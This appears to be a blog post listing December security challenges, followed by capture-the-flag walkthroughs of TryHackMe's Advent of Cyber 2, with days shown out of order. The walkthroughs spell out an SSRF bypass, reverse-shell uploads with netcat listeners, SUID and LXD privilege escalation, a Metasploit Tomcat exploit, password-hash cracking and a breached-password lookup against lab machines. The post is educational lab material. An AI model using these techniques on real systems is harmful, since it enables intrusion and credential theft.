Every year in December a good number of programming or security challenges surface in an Advent calendar style. They usually offer something new every day.
Of course there is way too much for anyone to take in at once so I have made my choice. If you are still on the fence on what to try, maybe my list can give you some inspirations. All of them are free to participate.
Advent of Cyber – TryHackMe.com
For the third time in a row the hands on security education platform TryHackMe is launching their Advent of Cyber.
Every day you get a very beginner friendly task in the realm of IT Security. From web exploitation over network attacks to blue team tasks and OSINT the variety is huge. There always are walk-throughs provided by well known security content creators, if you need assistance.
To motivate you they even sprinkle in some pretty cool prizes. Last years event was a great way to introduce new people to the world of IT security.
I might have grown a bit out of the relatively easy tasks but the creative and fun challenges still peak my interest.
I always noticed https://adventofcode.com/ in my social media bubbles in the past years but never participated. But I feel like I have become a bit rusty with my coding so I will do it this year!
Basically it are two coding puzzles every day, wrapped into a fun little story. Just check out the previous years if you want to get a good idea of what to expect.
Sans Holiday Hack Challenge
This probably is the most elaborate holiday themed Hack Challenge. It only starts Mid-December but it features a isometric world you can walk in and interact with elves as well as Santa.
There are a lot of challenges spread around the world for you to tackle and progress the story. While they still remain beginner friendly the difficulty picks up quite a bit soon and you most likely will have to do a bit of research to complete them. There always are pointers for that to check out though as well as a very helpful community.
There also are a couple of talks paired with it. Overall my favorite Holiday past time in the last years.
Hack the Box also is running a Christmas themed CTF with nice prizes this year. But it is only active until Dec. 5th.
It is a jeopardy style CTF where you solves a set of challenges for points. If you are familiar with the HTB CTFs this one is like them.
This year will have 5 tasks each in the categories web, crypto, PWN, reversing and forensics. The challenges are set at a beginner level but do not come with educational pointers.
It looks like it is requesting something from a different server for the search. This means we most likely can request other services too. It might be a Server Side Request Forgery (SSRF) vulnerability, since we can make the server make requests.
Let#s try a accessing the same server by using http://10.10.154.156/?proxy=http://localhost as proxy parameter.
Looks like there is a policy in place that prevents that. Other external urls like google.com will give the same error.
It seems like the domain has to start with list.hohoho.
The challenge hint right on to that we need to use localtest.me to bypass the hostname filter with is set to localhost. So let’s use list.hohoho.localtest.me as proxy.
Ohh, this gives us a response:
This reveals the password and we can use that together with the username Santa to log into the admin panel.
There we can delete the naughty list, which will display the flag.
Day 20 – PowershELlF to the rescue
As before we deploy both attack box and the challenge.
First we ssh into the challenge box ssh -l mceager 10.10.104.58, accpet the fingerprint and enter thge supplied password.
We end up in a windows cmd prompt. Let’s first upgrade to powershell
With cd .\Documents\ we change into the Documents folder. Tab completion will help us. ls -Hidden reveals the folders hidden content. With cat we can print the content of e1fone.txt.
Then we do the same loop with the Desktop. cd .. and cd .\Desktop\. Another ls -Hidden shown a new folder, we cd .\elf2wo\ into it. There are no hidden files in here so we use ls without the hidden flag to show the files. Using cat again to display it’s content.
For the third task we are supposed to search the windows folder, so we cd C:\Windows\System32\ into it. There are a lot of files and we need to filter them down with ls -Hidden -Directory -Filter "*3*"
After changing into the folder, we wil notice it has 2 hidden files. The first one, where we are supposed to count words is pretty long. Too long for a manual count. We can use Measure-Object for that. We cat the file and pipe it to it. cat .\1.txt | Measure-Object -Word
To get specific words from the file, we can use powershells ability to access objects as arrays: (cat .\1.txt)[551, 6991]
For the final question we will use the select string commandlet. cat .\2.txt | Select-String "redryder" and yes, I had to use the hint to realize it had to be in there as one word and lower case.
Day 21 – Time for some ELForensics
We deploy the machines and follow the guide in the challenge to connect via RDP.
After opening powershell, we change the directory to Document s. With ls we can check for files, then cat will print the files content.
Get-FileHash -Algorithm MD5 .\deebee.exe Gives us the MD5 hash of that file.
Luckily we have a strings tool on the machine so we can inspect the strings in that mysterious binary to find something interesting with c:\Tools\strings64.exe -accepteula .\deebee.exe, for example a flag.
The second stream is the one we are looking for. Using the stream related command in the description and the correct stream we can run the DB connector: wmic process call create $(Resolve-Path .\deebee.exe:hidedb)
It will open another command window with the DB access and a flag.
Day 22 – Elf McEager becomes CyberElf
We start with the usual deploy & RDP connection dance.
For the first task, it looks like the folder is something encoded. Opening that in Cyberchef and pulling over the magic solver, we should get the password. thegrinchwashere. In there we also see the encoding.
We can no open up the password file. The passwords are encoded as well so we put them into cyberchef again. Magic does the trick.
For the final flag we have to look at the recycle bin.
That is JavaScript and we can put it into the Web developers console of our web browser
This gives us a github gist url we can visit to get the flag.
Day 23 – The Grinch strikes again!
And once more we deploy and log in with RDP.
There is a ransom note on out desktop. The bitcoin address seems to be encoded in some way. The two == hint that it might be base64. Using a decoder like CyberChef we will get the address.
Looking around in our documents folder we find a lot of files that have been renamed.
Opening up the task Scheduler and looking at the library, we will find a unusually names task and under actions it lists what .exe is run.
In the details of the shadow Copy task, we will find the volume ID.
The Disk Management utility shows that there is a backup partition and we can assign it a drive letter to access it.
We need to set the explorer options to show hidden folders so we can see the hidden one.
Following the instructions opf the final task, we get the last answer.
Day 24 – The Trial Before Christmas
For a final time we deploy the attack box and the challenge.
We don’t know anything about the box so we will run an nmap scan for all ports. This will take very long.
We find port 80 and 65000 open.
We bring up the site on port 65000 in the browser. You can find the title in the tab name or by looking at the source code.
Now it is time to bust out gobuster to do some directory and file brute forcing. Since we waited so long for the nmap, I take chances and use only a small word-list and the php extension.
Pulling up http://10.10.73.143:65000/uploads.php gets us to a upload functionality. But even if we upload legitimate images it gives us a Invalid File-type Error.
Let’s look at the source code by pulling up the web developer tools and using the debugger. There is a filter.js and it always returns false.
We start burp, set the browsers proxy to it and Edit the intercept exception rule to not include .js anymore. Then we reload the page and forward all requests but drop the request to filter.js .
Now we copy a default php reverse shell cp /usr/share/webshells/php/php-reverse-shell.php ./rs.jpg.php. We include the .jpg in the filename just in case there is a server side file type check in place. This will not fool every check, but very simple ones.
Now we edit the file to match our IP and specify a port. Then we start a netcat listener on that port with nc -lvnp 4444
Then we turn off intercept in burp and upload the file. Next we need to find the folder where it is stored. In our directory scan we found grid. Pulling that up in the browser, we find our uploaded file.
After clicking that, we should have a connection on our listener. First thing to do is to stabilize the shell. There are multiple ways of doing this but we will follow the guide in this challenge.
python3 -c 'import pty;pty.spawn("/bin/bash")'
followed by export TERM=xterm, CTRL+z and stty raw -echo; fg
With our shell stabilized, we can start to look around. whoami returns www-data, a rather common user for the webserver. This means our permissions are most likely restricted to the webserver folders.
Let’s have a look at those with cd /var/www/ and ls. There is our web.txt and we can cat it.
There is another folder, TheGrid. we cd into it and look around. It has an include sub-folder and we can find the DB credential in dbauth.php
Knowing the database credentials we can connect to it with. mysql -utron -p
show databases; Shows us the databases and use tron; let’s us select the one we need.
show tables displays the available tables and SELECT * From users; dumps the user data.
edc621628f6d19a13a00fd683f5e3ff7 looks like a hash. We can put it into a service like crackstation to reveal the password.
After an exit in mysql su flynn and using that password allows us to become flynn on the shell. cd ~ lets us navigate to the home folder, where we can cat user.txt
Now we need to escalate our privileges. ID shows us what groups flynn is in.
flynn@light-cycle:~$ id
uid=1000(flynn) gid=1000(flynn) groups=1000(flynn),109(lxd)
LXD is a container tool similar to docker. Luckily the challenge provides us with a walk-through of how to exploit it.
First we check for available images.
flynn@light-cycle:~$ lxc image list
To start your first container, try: lxc launch ubuntu:18.04
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCH | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
| Alpine | a569b9af4e85 | no | alpine v3.12 (20201220_03:48) | x86_64 | 3.07MB | Dec 20, 2020 at 3:51am (UTC) |
+--------+--------------+--------+-------------------------------+--------+--------+------------------------------+
Then we initialize the container lxc init Alpine foo -c security.privileged=true and add a device with the root filesystem lxc config device add foo bar disk source=/ path=/mnt/root recursive=true
lxc start foo starts the container and with lxc exec foo /bin/sh we get a shell in it.
cd /mnt/root/root gets us into the root folder where we can cat root.txt
That wraps up the Advent of Cyber 2 and earns us a nice certificate!
As with the first and second part I have split the post to not get it too long.
Day 14 – Where’s Rudolph?
This day I will keep a lot shorter and basically just give some additional hints.
For the first task we go to reddit and open up a random profile of a user. Then we replace the username in the url to IGuidetheClaus2020. Then it only is a matter of clicking on Comments and you have the first url.
Read through the posts, the second gives you the next answer.
Robert is Rudolf’s creator. Googling for rudolf creator we will give you the third answer.
On his reddit comments he speaks about twitter (Q4) and testing his reddit username, we find it is the same. (Q5)
In his tweets he mentions a TV show and that aswers question 6.
For Question 7 we can use googles reverse image search and find out about the city.
Downloading the file and looking at the EXIF data of the image wil give us a location (Q8) and a flag.
Rudolf has posted a email address in his twitter bio. Putting that into https://scylla.sh/api (a search for data breaches) as search term email:rudolphthered@hotmail.com will give us his password.
Using the GPS exif data from his image in google maps, we find that he is staying in the Marriott in Chicago. Street number is in the hotel details.
Day 15 – There’s a Python in my stocking!
The first question of today can all be answered by running the code in the python interpreter True + True and the second one can be answered by reading the day’s description.
bool("False") we can put into the interpreter again and Question 4 is another one for the Description.
For the code analysis we could just put the code into the interpreter and see what comes out. But let’s look at the code more in detail.
x = [1, 2, 3] Creates a Variable names x with the array containing 1, 2 and 3
y = x Because python used pass by reference this creates a variable y that points to the same thing (the array in this case) as x
y.append(6) appends 6 to the array y and x are pointing to.
print(x) prints the array.
Day 16 – Help! Where is Santa?
Since it gives us easier access to the challenge, we are going to use the attack box again. Deploy it and the challenge.
Pulling up the page in the web browser without any ports (meaning on 80), does not work, so we have to find the correct port.
A quick nmap scan should do the trick.
root@ip-10-10-226-56:~# nmap 10.10.244.23
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-23 03:55 GMT
Nmap scan report for ip-10-10-244-23.eu-west-1.compute.internal (10.10.244.23)
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
8000/tcp open http-alt
MAC Address: 02:7D:17:61:1D:3D (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
Now we can pull up the site with the browser.
The site suggests finding the link to the API with a python script and you should do that for practice if you haven’t done much with python yet.
But we can also view source and search for api.
Accessing http://10.10.244.23:8000/api/ will give us a JSON response of: {"detail":"Not Found"}. We have to supply the API key. The challenge warns us that the server will block us after a certain amount of wrong attempts.
It also tells us, that the key is between 1 and 100 and odd. Which leaves 50 different keys to try.
Let’s write a python script to go through all potential keys:
# Importing the requests libary that allows us to do html requests
import requests
# We use a for loop to iterate over all potential API keys.
# We use the step size of two becasue of the info that the valid key is odd
for apikey in range(1,100,2):
# We make the request and store it in response. to concatonate a string
# (the api url ) with a number(the key) we need to convert the number to
# a string first
response = requests.get('http://10.10.244.23:8000/api/' + str(apikey) )
# now we print the text of the response
print(response.text)
In the console output of that script we will find the answers.
Day 17 – ReverseELFneering
First we deploy both boxes. Once they are up, we ssh into the challenge box with the provided credentials.
I highly recommend that you do the example file1 walk through provided in the challenge to get used to the tools.
We open the challenge file in radare with r2 -d ./challenge1 and start the analysis with aa. This will take a while.
pdf @main shows us the content of the main function of the program.
In there we can already see what value is are stored in local_ch first.
We can use two approaches here. the first is to go through the instructions and logically examine what should be in the variable asked for. But we can also use break points and step through the instructions, then look at the memory. We will use the later approach, even if the first would be faster in a simple program like this.
To find out what value is in eax when imul is called, we can set a break point at that function call with db 0x00400b62, then run the program up until the break point with dc.
Then we step through the instruction and look with px @eax at the memory content of eax.
Stepping one instruction further, we can use px @rbp-0x4 to get the content of local_4h. We know local_4h is at @rbp-0x4 by looking at the top of main, where the variables are defined.
Day 18 – The Bits of Christmas
We start again with deploying the attack box and challenge. After giving it 5 minutes or so to start, follow the guide on how to connect to the windows remote desktop. Eventually you should see the Desktop.
We open up the TBFC_APP with ILSpy and can start browsing through the decompiled code.
Spotting the CrackMe portion, we dig further into that. It looks like this is where the form is handled. We are interested in the main form.
Let’s see what the code is the button will run when clicked:
Looks like there is a password check in there and it references the correct password.
Further down is also the Flag that will be printed out if the correct password is supplied. This already answers the questions, but we can of course also run the program, supply the password and see the flag.
For this challenge we do not need the attack box. We download the pcaps and if we do not already have wireshark installed, we will have to get that too.
For the first task, we open up the first pcap and put ICMP into the filter bar to only see ICMP pakets.
To see only the http get requests, we use the filter again. We filter for the http get mehod with http.request.method == GET.
For the next question we filter for the requested ip and the http GET method with ip.addr == 10.10.67.199 && http.request
Looking through the requests should give us a good hint of what article he was searching for.
Next we open up the second pcap and utilize the filter once more. ftp should filter the requests down enough.
To find the encrypted protocol, we can sort by protocol and scroll through them. That should give a quick find.
For the last task we open up the third pcap. HTTP is a protocol often used for file transfer, so we filter for that.
Then we select the response and go to File->Export Objects->HTTP. In the next dialog we can select the .zip file.
In that zip we will find the wishlist and with it the final answer.
Day 8 – What’s Under the Christmas Tree?
For this day we are back to our beloved attack box. Deploy that and the challenge. While that is loading, spend some time to google for the first question. Wikipedia is a good source for the answer 😉
Now we scan the deployed box with nmap.
nmap 10.10.82.53
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 00:57 GMT
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0012s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1
3389/tcp open ms-wbt-server
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 1.63 seconds
The challange wants us to experiemtn a bit with the -Pn, -sV and -A flag and we do so. This should help us find the OS of the system, too.
I do like to add a -v for more verbose output to my nmap scans.
nmap -sV -v 10.10.82.53
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 01:01 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 01:01
Scanning 10.10.82.53 [1 port]
Completed ARP Ping Scan at 01:01, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:01
Completed Parallel DNS resolution of 1 host. at 01:01, 0.00s elapsed
Initiating SYN Stealth Scan at 01:01
Scanning ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53) [1000 ports]
Discovered open port 3389/tcp on 10.10.82.53
Discovered open port 80/tcp on 10.10.82.53
Discovered open port 2222/tcp on 10.10.82.53
Completed SYN Stealth Scan at 01:01, 1.25s elapsed (1000 total ports)
Initiating Service scan at 01:01
Scanning 3 services on ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Completed Service scan at 01:02, 6.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.82.53.
Initiating NSE at 01:02
Completed NSE at 01:02, 0.01s elapsed
Initiating NSE at 01:02
Completed NSE at 01:02, 0.00s elapsed
Nmap scan report for ip-10-10-82-53.eu-west-1.compute.internal (10.10.82.53)
Host is up (0.0017s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
3389/tcp open ms-wbt-server xrdp
MAC Address: 02:A3:D0:DC:D1:2F (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds
Raw packets sent: 1002 (44.072KB) | Rcvd: 1237 (52.535KB)
For the next task, we are supposed to run the http.title scrip. But that scrip already was part of our experiments with -A
This gives us enough information to finish the day. But there are quite a few Easter eggs hidden in this day and you really should take the opportunity to play around a bit with nmap here.
Day 9 – Anyone can be Santa!
Today is all about FTP so let’s get the attack box and the challenge deployed.
First we connect to the server via ftp and have a look. We don’t have credential yet so we go with anonymous. With ls we can list the directories content, just like we do in the terminal.
There is only one folder we can access as anonymous. We use cd to change into it, then ls again to see the content.
There are two files and we can download them to our attack box with get filename. In our local filesystem we open up the shopping list first and answer question 3.
Now it is time to open up the script in an editor.
#!/bin/bash
# Created by ElfMcEager to backup all of Santa's goodies!
# Create backups to include date DD/MM/YYYY
filename="backup_`date +%d`_`date +%m`_`date +%Y`.tar.gz";
# Backup FTP folder and store in elfmceager's home directory
tar -zcvf /home/elfmceager/$filename /opt/ftp
# TO-DO: Automate transfer of backups to backup server
It is a Backup script that absolutely should not be in the public folder. We even have permissions to upload in that folder.
, a simple bash reverse shell, to the script and save it. The IP in there needs to be your attack box IP not the one from the challenge.
Before we upload the modified script, we need to set up a listener for our reverse shell. nc -lvnp 4444 does the trick.
Now we can upload the scrip with put in ftp.
After a minute or two, we should get a connection on our listener.
With cat /root/flag.txt we read our final flag.
Day 10: Don’t be so sElfish
As always we deploy attack box and the challenge. First we run enum4linux with -U to enumerate users.
root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -U 10.10.180.212
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:41:50 2020
==========================
| Target Information |
==========================
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.180.212 |
=====================================================
[+] Got domain/workgroup name: TBFC-SMB-01
======================================
| Session Check on 10.10.180.212 |
======================================
[+] Server 10.10.180.212 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.180.212 |
============================================
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==============================
| Users on 10.10.180.212 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: elfmcskidy Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elfmceager Name: elfmceagerDesc:
index: 0x3 RID: 0x3e9 acb: 0x00000010 Account: elfmcelferson Name: Desc:
user:[elfmcskidy] rid:[0x3e8]
user:[elfmceager] rid:[0x3ea]
user:[elfmcelferson] rid:[0x3e9]
enum4linux complete on Sun Dec 13 09:41:51 2020
This gives us the users. Now we also enumerate the shares:
root@ip-10-10-214-41:~/Desktop/Tools/Miscellaneous# ./enum4linux.pl -S 10.10.180.212
WARNING: polenum.py is not in your path. Check that package is installed and your PATH is sane.
WARNING: ldapsearch is not in your path. Check that package is installed and your PATH is sane.
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 13 09:45:10 2020
==========================
| Target Information |
==========================
Target ........... 10.10.180.212
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 10.10.180.212 |
=====================================================
[+] Got domain/workgroup name: TBFC-SMB-01
======================================
| Session Check on 10.10.180.212 |
======================================
[+] Server 10.10.180.212 allows sessions using username '', password ''
============================================
| Getting domain SID for 10.10.180.212 |
============================================
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==========================================
| Share Enumeration on 10.10.180.212 |
==========================================
WARNING: The "syslog" option is deprecated
Sharename Type Comment
--------- ---- -------
tbfc-hr Disk tbfc-hr
tbfc-it Disk tbfc-it
tbfc-santa Disk tbfc-santa
IPC$ IPC IPC Service (tbfc-smb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
TBFC-SMB-01 TBFC-SMB
[+] Attempting to map shares on 10.10.180.212
//10.10.180.212/tbfc-hr Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-it Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-santa Mapping: OK, Listing: OK
//10.10.180.212/IPC$ [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Dec 13 09:45:11 2020
The output shows us that tbfc-santa courld be mapped. Let’s try to log into this share with no password. With dir we list the content and should have all information to finish the tasks.
Day 11 – The Rogue Gnome
We start up the attack box and challenge. While they boot we read the documentation in the challenge and answer the first two questions.
The we SSH into the box with the provided credentials. ssh cmnatic@10.10.154.38. On the first connect, you will have to confirm the servers fingerprint.
With find / -perm -u=s -type f 2>/dev/null we search for binaries that have the SUID bit set. Meaning they can be executed with the permission of a different user.
/bin/bash looks liek a very prmising candidate. Let#s check the permissions.
-bash-4.4$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash
-bash-4.4$
Looks like it can be run as root. We will do just that with bash -p
Now we can cat the flag file.
Day 12: Ready, set, elf.
After deploying the boxes we run a quick nmap scan to get an overview:
root@ip-10-10-214-41:~# nmap -sV -v 10.10.83.199
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 10:24 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:24
Scanning 10.10.83.199 [1 port]
Completed ARP Ping Scan at 10:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.00s elapsed
Initiating SYN Stealth Scan at 10:24
Scanning ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199) [1000 ports]
Discovered open port 8080/tcp on 10.10.83.199
Discovered open port 3389/tcp on 10.10.83.199
Discovered open port 8009/tcp on 10.10.83.199
Increasing send delay for 10.10.83.199 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Completed SYN Stealth Scan at 10:24, 20.25s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 3 services on ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Completed Service scan at 10:25, 13.88s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.83.199.
Initiating NSE at 10:25
Completed NSE at 10:25, 0.30s elapsed
Initiating NSE at 10:25
Completed NSE at 10:25, 0.00s elapsed
Nmap scan report for ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Host is up (0.011s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
3389/tcp open ms-wbt-server Microsoft Terminal Services
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.60%I=7%D=12/13%Time=5FD5EBF5%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2000,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;char
SF:set=UTF-8\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:53\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\n\r\n\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20l
SF:ang=\"en\">\r\n\x20\x20\x20\x20<head>\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<meta\x20charset=\"UTF-8\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:title>Apache\x20Tomcat/9\.0\.17</title>\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20<link\x20href=\"favicon\.ico\"\x20rel=\"icon\"\x20type=\"image/x-ic
SF:on\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"favicon\.
SF:ico\"\x20rel=\"shortcut\x20icon\"\x20type=\"image/x-icon\"\x20/>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"tomcat\.css\"\x20rel=\"sty
SF:lesheet\"\x20type=\"text/css\"\x20/>\r\n\x20\x20\x20\x20</head>\r\n\r\n
SF:\x20\x20\x20\x20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\"
SF:wrapper\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20i
SF:d=\"navigation\"\x20class=\"curved\x20container\">\r\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"nav-home\"
SF:><a\x20href=\"https://tomcat\.apache\.org/\">Home</a></span>\r\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"
SF:nav-hosts\"><a\x20href=\"/docs/\">Documentation</a></span>\r\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"na
SF:v-config\"><a\x20href=\"/docs/config/\">Configuration</a></span>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20i
SF:d=\"nav-examples\"><a\x20href=\"/examples/\">Examples")%r(HTTPOptions,7
SF:D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HEAD,\x20POST,\x20OPTIONS\
SF:r\nContent-Length:\x200\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:
SF:54\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,8CB,"HTTP/1\.
SF:1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lan
SF:guage:\x20en\r\nContent-Length:\x202114\r\nDate:\x20Sun,\x2013\x20Dec\x
SF:202020\x2010:24:54\x20GMT\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"
SF:><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x20Version\
SF:x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-si
SF:ze:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;font-size:16px;}\x20h3\x20{font-family:Tahoma,Ari
SF:al,sans-serif;color:white;background-color:#525D76;font-size:14px;}\x20
SF:body\x20{font-family:Tahoma,Arial,sans-serif;color:black;background-col
SF:or:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sans-serif;ba
SF:ckground:white;color:black;font-size:12px;}\x20a\x20{color:black;}\x20a
SF:\.name\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525
SF:D76;border:none;}</style></head><body><h");
MAC Address: 02:34:E1:B1:70:6F (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.07 seconds
Raw packets sent: 3011 (132.468KB) | Rcvd: 20 (872B)
Looks like there is a webserver running on port 8080. Let’s look at it by pulling it up in the browser.
Here we can see what version of tomcat is running. Now we start metasploit with msfconsole
search tomcat list a number of explots metasploit provides for tomcat. info path allows us to view the details of an explot.
The one that seems promising is info exploit/windows/http/tomcat_cgi_cmdlineargs
msf5 > info exploit/windows/http/tomcat_cgi_cmdlineargs
Name: Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
Module: exploit/windows/http/tomcat_cgi_cmdlineargs
Platform: Windows
Arch: x86, x64
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2019-04-10
Provided by:
Yakov Shafranovich
sinn3r <sinn3r@metasploit.com>
Module side effects:
ioc-in-logs
artifacts-on-disk
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Apache Tomcat 9.0 or prior for Windows
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The URI path to CGI script
VHOST no HTTP server virtual host
Payload information:
Description:
This module exploits a vulnerability in Apache Tomcat's CGIServlet
component. When the enableCmdLineArguments setting is set to true, a
remote user can abuse this to execute system commands, and gain
remote code execution.
References:
https://cvedetails.com/cve/CVE-2019-0232/
We select it with use exploit/windows/http/tomcat_cgi_cmdlineargs
options shows us the available settings for this exploit. First we double check that LHOST is our attack box IP.
Then we set the RHOST to the servers IP. set RHOST 10.10.83.199
Now we need a file in the cgi folder. Following the challenge description we can find http://10.10.83.199:8080/cgi-bin/elfwhacker.bat We use set TARGETURI /cgi-bin/elfwhacker.bat and doube check our options.
When everything is fine, we issue exploit to start the attack.
We are now in a meterpreter session on the server. with dir we can list the directory content.
We can cat the flad file ad finish the challenge. There is more to explore here and you should use the opportunity to play around with metasploit and privilege escalation.
Day 13: Coal For Christmas
As always, hit the deploy buttons. Once everything is booted up, we run a quick nmap scan.
root@ip-10-10-224-179:~# nmap 10.10.34.134
Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-14 10:58 GMT
Nmap scan report for ip-10-10-34-134.eu-west-1.compute.internal (10.10.34.134)
Host is up (0.00082s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp open ssh
23/tcp open telnet
111/tcp open rpcbind
MAC Address: 02:91:2C:86:CD:15 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds
Telnet is a insecure predecessor of ssh. So lets connect with telnet 10.10.34.134 23. Luckily for us, we are provided with cenential in the greeting text.
First thing we do is getting a idea of what system we are dealing with.
$ uname -a
Linux christmas 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"
With ls we have a look at what files we have in our hom folder.
$ ls
christmas.sh cookies_and_milk.txt
Looking at cookies_and_milk.txt we will be able to answer Question of who got there first.
